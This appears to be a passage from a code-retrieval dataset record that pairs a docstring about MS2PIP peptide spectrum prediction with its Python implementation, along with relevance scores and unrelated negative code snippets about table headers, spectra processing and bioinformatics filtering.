history_lines",
"def write_header(worksheet, curr_row, cols, data_cols, header_format, stages):\n\n ### Merge range function takes the locations of the cells to merge, the data\n ### to write and the cell format. A sample input would look like:\n ### worksheet.merge_range(\"A0:B1\", \"Location\", cell_format_obj)\n ### The above call will merge 4 cells: A0, A1, B0, B1 and fill it with the\n ### value \"Location\". \n \n end_row = curr_row + CELL_HT[\"location\"]\n row_range = cols[0] + str(curr_row) + \":\" + cols[0] + str(end_row)\n worksheet.merge_range(row_range, \"Location\", header_format)\n \n num_pop_cols = sum(map(lambda i: \"pop\" in i, data_cols)) - 1\n num_tfr_cols = sum(map(lambda i: \"tfr\" in i, data_cols)) - 1\n\n col_end = 0\n for i, stage in enumerate(stages):\n \n if stage == \"pop\":\n unit_txt = \" (in millions)\"\n stage_txt = \"Population\"\n col_range = num_pop_cols\n else:\n unit_txt = \"\"\n stage_txt = \"Total Fertility Rate\"\n col_range = num_tfr_cols\n \n col_st = col_end + 1\n col_end = col_st + col_range\n \n curr_row_copy = curr_row\n end_row = curr_row_copy + CELL_HT[\"stage\"]\n\n row_range = (\n cols[col_st] + str(curr_row_copy) + \":\" +\n cols[col_end] + str(end_row)\n )\n \n col_txt = stage_txt + unit_txt\n worksheet.merge_range(row_range, col_txt, header_format)\n\n curr_row_copy = end_row + 1\n end_row = curr_row_copy + CELL_HT[\"stage\"]\n \n col_st_copy = col_st\n \n for column in data_cols:\n if stage in column: \n row_range = cols[col_st_copy] + str(curr_row_copy)\n worksheet.write(row_range, COL_NAME_MAP[column], header_format)\n col_st_copy += 1\n \n\n return end_row + 1",
"def test_same_indizes(self):\n # TODO: Exception\n with self.assertRaises(Exception):\n self.test_table.change_header(Path=1, SectionType=1, Value=2)",
"def header(self, cols, parent_row):\n out = []\n for col in cols:\n if col == 'gau_id':\n out.append(self.name_for('Geographies', parent_row['geography_id']))\n elif col == 'oth_1_id':\n out.append(self.name_for('OtherIndexes', parent_row['other_index_1_id']))\n elif col == 'oth_2_id':\n out.append(self.name_for('OtherIndexes', parent_row['other_index_2_id']))\n else:\n out.append(col)\n return out",
"def InsertColumnInfo(self, before, colInfo):\r\n\r\n self._header_win.InsertColumnInfo(before, colInfo)\r\n self._header_win.Refresh()",
"def reorder_cols(df,left=6, right=7):\n cols = list(df.columns)\n cols[left], cols[right] = cols[right], cols[left]\n return df[cols]",
"def _addStatsHeadersToMatrix(self, m):\n\n atoz = \"JKLMNOPQRSTUVWXYZABCDEFGHI\"\n\n counter = 0\n\n for col in m.TopAxis.DataMembers:\n if counter < 26:\n logicalletter = str(atoz[counter])\n col.MemberSigTestHeading = logicalletter\n counter += 1\n else:\n counter = 0",
"def write_top(self, left_header, right_header):\n for i in range(max(len(left_header), len(right_header))):\n if i < len(left_header):\n left = left_header[i]\n else:\n left = ''\n if i < len(right_header):\n right = right_header[i]\n else:\n right = ''\n \n # Add row to header_rows buffer\n left_td = E.TD(left)\n left_td.attrib['class'] = 'left'\n right_td = E.TD(right)\n right_td.attrib['class'] = 'right'\n tr = E.TR(left_td, right_td)\n self.buffers['header_rows'].append(self._serialize(tr))",
"def set_dims_in_hdr(hdr, startx, starty, cols, rows):\n hdr['startX'] = (startx, 'Starting CCD pixel column')\n hdr['endX'] = (startx + cols, 'Ending CCD pixel column+1')\n hdr['startY'] = (starty, 'Starting CCD pixel row')\n hdr['endY'] = (starty + rows, 'Ending CCD pixel row+1')",
"def first_header():\n return \"\"\"\n<th>Target\n<th>Date\n<th colspan=\"2\">UT\n<th>Exp\n<th>Cycle\n<th>No. of\n<th>Filters\n<th>XxY\n<th>Speed\n<th>NX1xNY1\n<th>X1\n<th>Y1\n<th>NX2xNY2\n<th>X2\n<th>Y2\n<th>Grat.\n<th>Slit\n<th>Slit\n<th>ID\n<th>PI\n<th align=\"left\">Comment\n\"\"\"",
"def test_simple_change(self):\n self.test_table.change_header(Path=1, SectionType=2, Value=3)\n self.assertListEqual(self.test_table._header, [\"Path\", \"SectionType\", \"Value\"])",
"def _configure_bintable_header(new_header, table_headers):\n\n # Using a single header to get the column descriptions\n column_info = {}\n for kwd in table_headers[0]:\n if \"TTYPE\" not in kwd:\n continue\n \n colname = table_headers[0][kwd]\n num = kwd.replace(\"TTYPE\", \"\")\n \n cards = []\n for att in ['TTYPE', 'TFORM', 'TUNIT', 'TDISP', 'TDIM']:\n try:\n cards.append(table_headers[0].cards[att+num])\n except KeyError:\n pass # if we don't have info for this keyword, just skip it\n \n column_info[colname] = (num, cards)\n\n # Adding column descriptions and additional info\n for kwd in new_header:\n if \"TTYPE\" not in kwd:\n continue\n \n colname = new_header[kwd]\n num = kwd.replace(\"TTYPE\", \"\")\n \n info_row = column_info.get(colname)\n if not info_row:\n new_header.comments[kwd] = 'column name'\n new_header.comments[kwd.replace(\"TTYPE\", \"TFORM\")] = 'column format'\n continue\n \n info_num = info_row[0]\n cards = info_row[1]\n \n for key, val, desc in cards:\n key_new = key.replace(info_num, num)\n try:\n ext_card = new_header.cards[key_new]\n \n if ext_card[1]:\n val = ext_card[1]\n if ext_card[2]:\n desc = ext_card[2]\n \n new_header[key_new] = (val, desc)\n except KeyError: # card does not already exist, just add new one\n new_header.set(key_new, val, desc, after=kwd)\n\n # Adding any additional keywords from the original cutout headers\n shared_keywords = _combine_headers(table_headers, constant_only=True)\n for kwd in shared_keywords:\n if kwd in new_header: # Don't overwrite anything already there\n continue\n\n if any(x in kwd for x in [\"WCA\", \"WCS\", \"CTY\", \"CRP\", \"CRV\", \"CUN\",\n \"CDL\", \"11PC\", \"12PC\", \"21PC\", \"22PC\"]): # Skipping column WCS keywords\n continue\n\n new_header.append(shared_keywords.cards[kwd])",
"def get_header_table(self , dt, ds = '' , all_ds = '', length = ''):\n index_low = self.unique_dates[ds]['indices'][dt]['low']\n #index_up = self.unique_dates[best_ds]['indices'][dt]['up'] \n hd = self.data[ds]['header_table'][index_low:index_low+length] \n hd['duplicates'] = all_ds \n \n return hd",
"def update_header(self) -> None:\n self.header.partial_reset()\n self.header.point_format_id = self.points.point_format.id\n self.header.point_data_record_length = self.points.point_size\n\n if len(self.points) > 0:\n self.header.update(self.points)\n\n if self.header.version.minor >= 4:\n if self.evlrs is not None:\n self.header.number_of_evlrs = len(self.evlrs)\n self.header.start_of_waveform_data_packet_record = 0\n # TODO\n # if len(self.vlrs.get(\"WktCoordinateSystemVlr\")) == 1:\n # self.header.global_encoding.wkt = 1\n else:\n self.header.number_of_evlrs = 0",
"def reorder_columns(df,first_cols=['']):\n\n last_cols = [col for col in df.columns if col not in first_cols]\n df = df[first_cols+last_cols]\n return(df)",
"def _html_table_headers(self, row_axes, col_axes):\n dsh = self.get_dshape()\n nb_blank_cols = len(row_axes) * 2 # nb of blank cols preprended to\n # each line of the column header\n nb_rows = int(np.prod([dsh[a] for a in row_axes]))\n nb_cols = int(np.prod([dsh[a] for a in col_axes]))\n # col header\n if nb_blank_cols > 0:\n blank_cells = ['']\n blank_cells_attrs = [{'colspan': str(nb_blank_cols)}]\n else:\n blank_cells = []\n blank_cells_attrs = []\n col_header = []\n nb_repets = 1\n span = nb_cols\n for a in col_axes:\n dom = [str(v)\n for v in self.get_domain(a)] # TODO: better dv format\n span /= len(dom)\n # row showing the axis label\n col_header.append(html_list_to_row(blank_cells + [a], 'h',\n blank_cells_attrs +\n [{'colspan': nb_cols}]))\n # row showing domain values\n col_header.append(html_list_to_row(blank_cells + dom * nb_repets, 'h',\n blank_cells_attrs +\n [{'colspan': str(span)}] *\n len(dom) * nb_repets))\n nb_repets *= len(dom)\n\n # row header\n # initialization of all rows because row filling wont be sequential:\n row_header = [[] for i in range(nb_rows)]\n nb_repets = 1\n span = nb_rows\n for a in row_axes:\n # 1st row contains all axis labels:\n row_header[0].append(html_cell(html_div(a, {'class': 'rotate'}), 'h',\n {'rowspan': nb_rows}))\n\n # dispatch domain values across corresponding rows:\n dom = [str(v)\n for v in self.get_domain(a)] # TODO: better dv format\n span /= len(dom)\n for idv, dv in enumerate(dom * nb_repets):\n row_header[\n idv * span].append(html_cell(dv, 'h', {'rowspan': span}))\n\n nb_repets *= len(dom)\n\n return [''.join(r) for r in row_header], col_header",
"def parseColHeader(self, i, j) :\n cell_content = self.processString(self.source_cell.value)\n if self.isEmpty(i,j):\n if self.insideMergeBox(i,j):\n k, l = self.getMergeBoxCoord(i,j)\n \n # If we are in a vertical merge box, skip adding the dimension\n if l == j:\n return\n\n # Update cell content \n cell_content = self.processString(self.r_sheet.cell(k,l).value)\n else:\n return\n\n # Add the value qname to the column_dimensions list for that column\n self.column_dimensions.setdefault(j,[self.sheet_qname]).append(cell_content)\n \n # Add the data to the graph\n resource = self.getColHeaderValueURI(self.column_dimensions[j])\n self.graph.add((resource, RDF.type, self.namespaces['tablink']['ColumnHeader']))\n self.graph.add((resource, self.namespaces['skos']['prefLabel'], Literal(cell_content)))\n self.graph.add((resource, self.namespaces['tablink']['cell'], Literal(self.source_cell_name)))\n return",
"def remove_insertion_columns(self):\n cols = self.get_insertion_columns()\n s = []\n a = 0\n for b in cols:\n if b > a:\n s.append((a, b))\n a = b + 1\n s.append((a, len(self.col_labels)))\n for name, seq in list(self.items()):\n news = []\n for c in s:\n news.append(seq[c[0]:c[1]])\n self[name] = \"\".join(news)",
"def writeheader(fh,colnames):\n for i in range(len(colnames)):\n fh.write('# %d %s\\n'%(i+1,colnames[i]))",
"def set_headers(self,executer, tree, cursor, table, columns_size):\n\n # Getting headers\n headers = executer.get_columns(table, cursor)\n tree[\"columns\"] = headers\n\n # Setting width to all column headers basing on columns amount.\n set_width = int(self.column_length_configurator/len(headers))\n\n\n # Setting columns width and headers\n for column in headers:\n tree.column(column, width=set_width,minwidth=self.min_width)\n tree.heading(column, text=column)"
] |
[
"0.59891915",
"0.5937853",
"0.5717306",
"0.56989044",
"0.55527014",
"0.55497086",
"0.554682",
"0.55163383",
"0.5515728",
"0.5490882",
"0.54661727",
"0.5440973",
"0.5416742",
"0.5407916",
"0.5379768",
"0.53601754",
"0.53495514",
"0.5340874",
"0.5312372",
"0.53079784",
"0.5303606",
"0.5301132",
"0.5295812",
"0.5281456",
"0.52663493",
"0.5237425",
"0.5236226",
"0.5213548",
"0.5213127",
"0.5175083"
] |
0.7232093
|
0
|
Function for each worker to process a list of peptides. The models are chosen based on model. PTMmap, Ntermmap and Ctermmap determine the modifications applied to each peptide sequence. Returns the predicted spectra for all the peptides.
|
def process_peptides(worker_num, data, afile, modfile, modfile2, PTMmap, model):
ms2pip_pyx.ms2pip_init(afile, modfile, modfile2)
# Prepare output variables
pepid_buf = []
peplen_buf = []
charge_buf = []
mz_buf = []
target_buf = None
prediction_buf = []
vector_buf = []
# transform pandas dataframe into dictionary for easy access
if "ce" in data.columns:
specdict = (
data[["spec_id", "peptide", "modifications", "charge", "ce"]]
.set_index("spec_id")
.to_dict()
)
ces = specdict["ce"]
else:
specdict = (
data[["spec_id", "peptide", "modifications", "charge"]]
.set_index("spec_id")
.to_dict()
)
pepids = data["spec_id"].tolist()
peptides = specdict["peptide"]
modifications = specdict["modifications"]
charges = specdict["charge"]
del specdict
# Track progress for only one worker (good approximation of all workers' progress)
for pepid in track(
pepids,
total=len(pepids),
disable=worker_num != 0,
transient=True,
description="",
):
peptide = peptides[pepid]
peptide = peptide.replace("L", "I")
mods = modifications[pepid]
# TODO: Check if 30 is good default CE!
colen = 30
if "ce" in data.columns:
colen = ces[pepid]
# Peptides longer then 101 lead to "Segmentation fault (core dumped)"
if len(peptide) > 100:
continue
# convert peptide string to integer list to speed up C code
peptide = np.array(
[0] + [AMINO_ACID_IDS[x] for x in peptide] + [0], dtype=np.uint16
)
modpeptide = apply_mods(peptide, mods, PTMmap)
pepid_buf.append(pepid)
peplen = len(peptide) - 2
peplen_buf.append(peplen)
ch = charges[pepid]
charge_buf.append(ch)
model_id = MODELS[model]["id"]
peaks_version = MODELS[model]["peaks_version"]
# get ion mzs
mzs = ms2pip_pyx.get_mzs(modpeptide, peaks_version)
mz_buf.append([np.array(m, dtype=np.float32) for m in mzs])
# If using xgboost model file, get feature vectors to predict outside of MP.
# Predictions will be added in `_merge_predictions` function.
if "xgboost_model_files" in MODELS[model].keys():
vector_buf.append(
np.array(
ms2pip_pyx.get_vector(peptide, modpeptide, ch),
dtype=np.uint16,
)
)
else:
predictions = ms2pip_pyx.get_predictions(
peptide, modpeptide, ch, model_id, peaks_version, colen
)
prediction_buf.append([np.array(p, dtype=np.float32) for p in predictions])
return (
pepid_buf,
peplen_buf,
charge_buf,
mz_buf,
target_buf,
prediction_buf,
vector_buf,
)
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def process_spectra(\n worker_num,\n data,\n spec_file,\n vector_file,\n afile,\n modfile,\n modfile2,\n PTMmap,\n model,\n fragerror,\n spectrum_id_pattern,\n):\n ms2pip_pyx.ms2pip_init(afile, modfile, modfile2)\n\n model_id = MODELS[model][\"id\"]\n peaks_version = MODELS[model][\"peaks_version\"]\n\n # transform pandas data structure into dictionary for easy access\n if \"ce\" in data.columns:\n specdict = (\n data[[\"spec_id\", \"peptide\", \"modifications\", \"ce\"]]\n .set_index(\"spec_id\")\n .to_dict()\n )\n ces = specdict[\"ce\"]\n else:\n specdict = (\n data[[\"spec_id\", \"peptide\", \"modifications\", \"charge\"]].set_index(\"spec_id\").to_dict()\n )\n peptides = specdict[\"peptide\"]\n modifications = specdict[\"modifications\"]\n charges = specdict[\"charge\"]\n\n # cols contains the names of the computed features\n cols_n = get_feature_names_new()\n if \"ce\" in data.columns:\n cols_n.append(\"ce\")\n # cols_n = get_feature_names_catboost()\n\n # if vector_file\n dvectors = []\n dtargets = dict()\n psmids = []\n\n # else\n pepid_buf = []\n peplen_buf = []\n charge_buf = []\n mz_buf = []\n target_buf = []\n prediction_buf = []\n vector_buf = []\n\n spectrum_id_regex = re.compile(spectrum_id_pattern)\n\n # Track progress for only one worker (good approximation of all workers' progress)\n for spectrum in track(\n read_spectrum_file(spec_file),\n total=len(peptides),\n disable=worker_num != 0,\n transient=True,\n description=\"\",\n ):\n # Match title with regex\n match = spectrum_id_regex.search(spectrum.title)\n try:\n title = match[1]\n except (TypeError, IndexError):\n raise TitlePatternError(\n \"Spectrum title pattern could not be matched to spectrum IDs \"\n f\"`{spectrum.title}`. \"\n \" Are you sure that the regex contains a capturing group?\"\n )\n\n if title not in peptides:\n continue\n\n peptide = peptides[title]\n peptide = peptide.replace(\"L\", \"I\")\n mods = modifications[title]\n\n if spectrum.precursor_charge:\n charge = spectrum.precursor_charge\n else:\n charge = charges[title] # If charge cannot be parsed from MGF\n\n if \"mut\" in mods:\n continue\n\n # Peptides longer then 101 lead to \"Segmentation fault (core dumped)\"\n if len(peptide) > 100:\n continue\n\n # convert peptide string to integer list to speed up C code\n peptide = np.array(\n [0] + [AMINO_ACID_IDS[x] for x in peptide] + [0], dtype=np.uint16\n )\n\n try:\n modpeptide = apply_mods(peptide, mods, PTMmap)\n except UnknownModificationError as e:\n logger.warn(\"Unknown modification: %s\", e)\n continue\n\n # Spectrum preprocessing:\n # Remove reporter ions and percursor peak, normalize, tranform\n for label_type in [\"iTRAQ\", \"TMT\"]:\n if label_type in model:\n spectrum.remove_reporter_ions(\"iTRAQ\")\n # spectrum.remove_precursor()\n spectrum.tic_norm()\n spectrum.log2_transform()\n\n # TODO: Check if 30 is good default CE!\n # RG: removed `if ce == 0` in get_vector, split up into two functions\n colen = 30\n if \"ce\" in data.columns:\n try:\n colen = int(float(ces[title]))\n except:\n logger.warn(\"Could not parse collision energy!\")\n continue\n\n if vector_file:\n # get targets\n targets = ms2pip_pyx.get_targets(\n modpeptide,\n spectrum.msms,\n spectrum.peaks,\n float(fragerror),\n peaks_version,\n )\n psmids.extend([title] * (len(targets[0])))\n if \"ce\" in data.columns:\n dvectors.append(\n np.array(\n ms2pip_pyx.get_vector_ce(\n peptide, modpeptide, charge, colen\n ),\n dtype=np.uint16,\n )\n ) # SD: added collision energy\n else:\n dvectors.append(\n np.array(\n ms2pip_pyx.get_vector(peptide, modpeptide, charge),\n dtype=np.uint16,\n )\n )\n\n # Collecting targets to dict; works for variable number of ion types\n # For C-term ion types (y, y++, z), flip the order of targets,\n # for correct order in vectors DataFrame\n for i, t in enumerate(targets):\n if i in dtargets.keys():\n if i % 2 == 0:\n dtargets[i].extend(t)\n else:\n dtargets[i].extend(t[::-1])\n else:\n if i % 2 == 0:\n dtargets[i] = [t]\n else:\n dtargets[i] = [t[::-1]]\n\n else:\n # Predict the b- and y-ion intensities from the peptide\n pepid_buf.append(title)\n peplen_buf.append(len(peptide) - 2)\n charge_buf.append(charge)\n\n # get/append ion mzs, targets and predictions\n targets = ms2pip_pyx.get_targets(\n modpeptide,\n spectrum.msms,\n spectrum.peaks,\n float(fragerror),\n peaks_version,\n )\n target_buf.append([np.array(t, dtype=np.float32) for t in targets])\n mzs = ms2pip_pyx.get_mzs(modpeptide, peaks_version)\n mz_buf.append([np.array(m, dtype=np.float32) for m in mzs])\n\n # If using xgboost model file, get feature vectors to predict outside of MP.\n # Predictions will be added in `_merge_predictions` function.\n if \"xgboost_model_files\" in MODELS[model].keys():\n vector_buf.append(\n np.array(\n ms2pip_pyx.get_vector(peptide, modpeptide, charge),\n dtype=np.uint16,\n )\n )\n else:\n predictions = ms2pip_pyx.get_predictions(\n peptide, modpeptide, charge, model_id, peaks_version, colen\n )\n prediction_buf.append(\n [np.array(p, dtype=np.float32) for p in predictions]\n )\n\n # If feature vectors requested, return specific data\n if vector_file:\n if dvectors:\n # If num_cpu > number of spectra, dvectors can be empty\n if len(dvectors) >= 1:\n # Concatenate dvectors into 2D ndarray before making DataFrame to reduce\n # memory usage\n dvectors = np.concatenate(dvectors)\n df = pd.DataFrame(dvectors, dtype=np.uint16, copy=False)\n df.columns = df.columns.astype(str)\n else:\n df = pd.DataFrame()\n return psmids, df, dtargets\n\n # Else, return general data\n return (\n pepid_buf,\n peplen_buf,\n charge_buf,\n mz_buf,\n target_buf,\n prediction_buf,\n vector_buf,\n )",
"def get_filtered_probes(seqdf, escores, models, mutate_cutoff, mutate_gap,\n egaps, thresholds, proteins, colors,\n generate_plots=False, spcomb=[(0, 0)], analysis_path=\"\",\n mode=\"custom\", predict_flanks=True, flank_len=0,\n key_colname=\"key\",\n show_model_flanks=False, get_complete_mutated=True,\n primer=\"\", max_mutate_count=2):\n filtered_probes = []\n # iterate through each site num and peak len combination\n for comb in spcomb:\n # get escore and model predictions for each protein\n es_preds = {}\n esplots = {}\n model_preds = {}\n model_plots = {}\n sitenum = comb[0]\n peaklen = comb[1]\n\n # get rows with the current sitenum and peaklen if specified\n if sitenum != 0 and peaklen != 0:\n df = seqdf.loc[(seqdf[\"sites_in_peak\"] == sitenum) & (seqdf[\"peaklen\"] == peaklen)]\n # otherwise use all rows\n else:\n df = seqdf\n # initialize escore and model objects for each protein\n for protein in proteins:\n protein_num = proteins.index(protein)\n es_preds[protein] = escores[protein].predict_sequences(df, key_colname=key_colname)\n esplots[protein] = escores[protein].make_plot_data(es_preds[protein], color=colors[protein_num][0])\n\n model_preds[protein] = models[protein].predict_sequences(df,\n key_colname=key_colname,\n predict_flanks=predict_flanks,\n flank_len=flank_len)\n model_plots[protein] = models[protein].make_plot_data(model_preds[protein],\n color=colors[protein_num][1],\n show_model_flanks=show_model_flanks)\n\n # Generate plots\n if generate_plots:\n sp = SitesPlotter()\n # if need to plot, uncomment this\n sp.plot_seq_combine([esplots, model_plots],\n filepath=\"%s/sitesplot_d%d_p%d.pdf\" %\n (analysis_path, sitenum, peaklen))\n\n # get filtered sequences\n filtered_seqs = {}\n flanks = {}\n print(\"Site filtering...\")\n print(\"Number of sites before mutating:\", len(es_preds[proteins[0]]))\n\n # get sequences with 2 significant binding sites\n sites_mutated = 0\n sites_removed = 0\n failed_mutations = 0\n for key in es_preds[proteins[0]]:\n curr_es_preds = {}\n curr_model_preds = {}\n for protein in proteins:\n curr_es_preds[protein] = es_preds[protein][key]\n curr_model_preds[protein] = model_preds[protein][key]\n #print(key,\"asd\",curr_model_preds[\"ets1\"])\n bs = Sequence(curr_es_preds, curr_model_preds, proteins=proteins,\n escore_cutoff=mutate_cutoff, escore_gap=mutate_gap,\n pbmescores=escores)\n ### print(key, bs.is_valid())\n if bs.is_valid():\n filtered_seqs[key] = bs\n # TODO: move all print statements to a log file\n # print(\"Number of sites mutated:\", sites_mutated)\n # print(\"Number of failed mutations:\", failed_mutations)\n # print(\"Number of sites removed:\", sites_removed)\n print(\"Number of sites after filtering:\", len(filtered_seqs))\n\n print(\"Creating m1,m2,m3 sequences...\")\n # for each of the filtered sequence, create m1,m2,m3 sequences\n seqdict = {}\n funcdict = {}\n for key in filtered_seqs:\n # Visualization part\n seqdict[\"%s-wt\" % key] = filtered_seqs[key].sequence\n # current binding site object\n bs = filtered_seqs[key]\n # get m1,m2,m3 for each wt\n for idx, mut in enumerate([[0], [1], [0, 1]]):\n # here we mutate on the first, second, and both sites\n # mut is the index of the site to abolish\n to_remove = bs.remove_pos(mut)\n mutseq = bs.abolish_sites(to_remove, mode=\"to_eliminate\",\n escore_threshold=mutate_cutoff)\n seqdict[\"%s-m%d\" % (key, idx + 1)] = mutseq.sequence\n funcdict[\"%s-m%d\" % (key, idx + 1)] = mutseq.plot_functions\n\n # get sequences that pass given escore gap and threshold combination\n for e in list(itertools.product(egaps, thresholds)):\n egapthres = e[0]\n ecutoff = e[1]\n\n # check that wt, m1, m2, m3 are valid\n if coopfilter.check_all_seqs(seqdict[\"%s-wt\" % key],\n seqdict[\"%s-m1\" % key],\n seqdict[\"%s-m2\" % key],\n seqdict[\"%s-m3\" % key],\n filtered_seqs[key].get_sites_dict(),\n escores,\n escore_cutoff=ecutoff,\n escore_gap=egapthres,\n get_complete_mutated=get_complete_mutated):\n bsites_dict = filtered_seqs[key].get_sites_dict()\n lst = [seqdict[\"%s-wt\" % key], seqdict[\"%s-m1\" % key], seqdict[\"%s-m2\" % key],\n seqdict[\"%s-m3\" % key]]\n lst, successful = clean_junctions(seqlst=lst,\n proteins=proteins,\n escores=escores,\n models=models,\n mutate_cutoff=mutate_cutoff,\n mutate_gap=mutate_gap,\n primer=\"GTCTTGATTCGCTTGACGCTGCTG\",\n max_mutate_count=max_mutate_count)\n if successful:\n # replace seqdict with the new sequences\n seqdict[\"%s-wt\" % key] = lst[0]\n seqdict[\"%s-m1\" % key] = lst[1]\n seqdict[\"%s-m2\" % key] = lst[2]\n seqdict[\"%s-m3\" % key] = lst[3]\n filtered_probes.append({\"key\": key,\n \"wt\": seqdict[\"%s-wt\" % key],\n \"m1\": seqdict[\"%s-m1\" % key],\n \"m2\": seqdict[\"%s-m2\" % key],\n \"m3\": seqdict[\"%s-m3\" % key],\n \"tf1\": bsites_dict[\"protein_1\"],\n \"tf2\": bsites_dict[\"protein_2\"],\n \"core1_start\": bsites_dict[\"core_start_1\"],\n \"core1_mid\": bsites_dict[\"core_mid_1\"],\n \"core1_end\": bsites_dict[\"core_end_1\"],\n \"core1_pref\": bsites_dict[\"score_1\"],\n \"core2_start\": bsites_dict[\"core_start_2\"],\n \"core2_mid\": bsites_dict[\"core_mid_2\"],\n \"core2_end\": bsites_dict[\"core_end_2\"],\n \"core2_pref\": bsites_dict[\"score_2\"],\n \"ecutoff\": ecutoff,\n \"egapthres\": egapthres,\n \"distance\": filtered_seqs[key].get_sites_dist(),\n \"sites_in_peak\": sitenum,\n \"peak_length\": peaklen\n })\n break # the sequence passes the filtering check, so stop\n\n # generate plots of wt, m1, m2, m3\n if generate_plots:\n filtered_es_preds = {}\n filtered_esplots = {}\n filtered_model_preds = {}\n filtered_model_plots = {}\n for protein in proteins:\n protein_num = proteins.index(protein)\n filtered_es_preds[protein] = escores[protein].predict_sequences(seqdict, key_colname=\"key\")\n filtered_esplots[protein] = escores[protein].make_plot_data(filtered_es_preds[protein], color=colors[protein_num][0])\n\n filtered_model_preds[protein] = models[protein].predict_sequences(seqdict,\n key_colname=\"key\",\n predict_flanks=predict_flanks)\n filtered_model_plots[protein] = models[protein].make_plot_data(filtered_model_preds[protein],\n color=colors[protein_num][1],\n show_model_flanks=show_model_flanks)\n sp.plot_seq_combine([filtered_esplots, filtered_model_plots],\n filepath=\"%splot_%s_d%d_p%d.pdf\" % (analysis_path, mode, sitenum, peaklen))\n\n return filtered_probes",
"def run(self):\n\n # TODO: MOVE TO INIT?\n self.afile = write_amino_acid_masses()\n self.modfile = self.mods.write_modifications_file(mod_type=\"ptm\")\n self.modfile2 = self.mods.write_modifications_file(mod_type=\"sptm\")\n #\n\n self._read_peptide_information()\n\n if self.add_retention_time:\n logger.info(\"Adding retention time predictions\")\n rt_predictor = RetentionTime(config=self.params, num_cpu=self.num_cpu)\n rt_predictor.add_rt_predictions(self.data)\n\n # Spectrum file mode\n if self.spec_file:\n logger.info(\"Processing spectra and peptides...\")\n results = self._process_spectra()\n # Feature vectors requested\n if self.vector_file:\n self._write_vector_file(results)\n # Predictions (and targets) requested\n else:\n logger.debug(\"Merging results\")\n all_preds = self._merge_predictions(results)\n # Correlations also requested\n if self.compute_correlations:\n logger.info(\"Computing correlations\")\n correlations = calc_correlations.calc_correlations(all_preds)\n logger.info(\n \"Median correlations: \\n%s\",\n str(correlations.groupby(\"ion\")[\"pearsonr\"].median()),\n )\n if not self.return_results:\n corr_filename = self.output_filename + \"_correlations.csv\"\n logger.info(f\"Writing file {corr_filename}\")\n try:\n correlations.to_csv(\n corr_filename,\n index=True,\n lineterminator=\"\\n\",\n )\n except TypeError: # Pandas < 1.5 (Required for Python 3.7 support)\n correlations.to_csv(\n corr_filename,\n index=True,\n line_terminator=\"\\n\",\n )\n else:\n return correlations\n if not self.return_results:\n pae_filename = self.output_filename + \"_pred_and_emp.csv\"\n logger.info(f\"Writing file {pae_filename}...\")\n try:\n all_preds.to_csv(\n pae_filename,\n index=False,\n lineterminator=\"\\n\",\n )\n except TypeError: # Pandas < 1.5 (Required for Python 3.7 support)\n all_preds.to_csv(\n pae_filename,\n index=False,\n line_terminator=\"\\n\",\n )\n else:\n return all_preds\n\n # Match spectra mode\n elif self.match_spectra:\n results = self._process_peptides()\n matched_spectra = self._match_spectra(results)\n self._write_matched_spectra(matched_spectra)\n\n # Predictions-only mode\n else:\n logger.info(\"Processing peptides...\")\n results = self._process_peptides()\n\n logger.debug(\"Merging results ...\")\n all_preds = self._merge_predictions(results)\n\n if not self.return_results:\n self._write_predictions(all_preds)\n else:\n return all_preds",
"def RUN(numTrials, rateMap, numPhotons=48, angularSize=10.0, outputSize=300, mcList='MCOut.pickle',HESS=False, Sig = -1 ,numProcs = 10):\r\n print 'Beginning MC Series\\nProgress'\r\n \r\n import FermiPSF, ParseFermi\r\n mcOut = []\r\n map = pickle.load(open(rateMap, \"r\" )) # load rate-map\r\n PSFTableFront = FermiPSF.PSF_130(convType='front') # load PSF front converting\r\n PSFTableBack = FermiPSF.PSF_130(convType='back') # load PSF back converting\r\n\r\n start = time.time();\r\n \r\n ppa = outputSize/angularSize # pixel per degree\r\n\r\n # Import background template\r\n bgmap = 'BGRateMap.pickle'\r\n if (HESS == True):\r\n bgmap = 'BGRateMap_HESS_2_deg.pickle'\r\n \r\n bgTemplate = pickle.load(open(bgmap , \"r\" ))\r\n \r\n mcOut = np.zeros(numTrials)\r\n p = pool.Pool(numProcs)\r\n \r\n partial_MC_THREAD = partial( MC_THREAD, map = map,bgTemplate=bgTemplate,PSFTableFront=PSFTableFront, PSFTableBack=PSFTableBack, HESS=HESS, angularSize=angularSize, numPhotons=numPhotons, outputSize=outputSize,Sig = Sig)\r\n mcOut = p.map(partial_MC_THREAD, mcOut)\r\n \r\n# for i in range(numTrials): \r\n# # Build the background \r\n## background = Build_Background_Sideband(bgMean, lowSideband, highSideband, PSFTable)\r\n# background = Build_Background_Template(bg, bgTemplate, PSFTableFront, PSFTableBack,flatLevel = 0.0,HESS= HESS,angularSize = angularSize)\r\n# # Compute number of source photons\r\n# numMC = numPhotons - len(background[0])\r\n# # Run MC for source photons \r\n# data = MC(map,numMC,angularSize,outputSize,PSFTableFront, PSFTableBack,HESS=HESS)\r\n# # Append data\r\n# mcOut.append((data[0]+background[0], data[1]+background[1]))\r\n# \r\n# # Compute Speed Statistics\r\n# sys.stdout.write('\\r' + str(i+1)+'/'+str(numTrials)) \r\n# sys.stdout.flush()\r\n elapsed = time.time()-start;\r\n if (elapsed != 0.0):\r\n print '\\nSimulations Completed in', elapsed, 's', '(',numTrials/elapsed, ' sims per second)'\r\n \r\n outFile = open(mcList, \"wb\" )\r\n pickle.dump(mcOut, outFile)\r\n print 'Results saved to ', mcList\r\n return mcOut",
"def worker(selection_idx, results_table):\n randgen = np.random.RandomState()\n \n # Data-specific positive set partition (the real-world dataset consists of multiple motif classes, always exactly 3 instances of each class stored consequently).\n # The partition assures that the training and test sets do not share instances of the same motif class\n positive_n_train = round(0.8 * len(positive_set_) / 3) * 3\n block_start_idx = randgen.randint(positive_n_train / 3 + 1) * 3 \n block_end_idx = block_start_idx + len(positive_set_) - positive_n_train\n positive_set_part_train, positive_set_part_test = (np.concatenate((positive_set_[: block_start_idx], positive_set_[block_end_idx: ])), positive_set_[block_start_idx: block_end_idx])\n \n # Negative set partition with random selection of elements to match the size of the positive set\n negative_set = negative_set_[randgen.choice(len(negative_set_), size = positive_set_.shape[0], replace = False)]\n negative_n = len(negative_set)\n negative_n_train = round(negative_n * 0.8)\n negative_set_part_train, negative_set_part_test = (negative_set[: negative_n_train], negative_set[negative_n_train: ])\n \n data_part_train = np.float64(np.concatenate((positive_set_part_train, negative_set_part_train)))\n labels_part_train = np.concatenate((np.ones(len(positive_set_part_train), dtype = 'i1'), 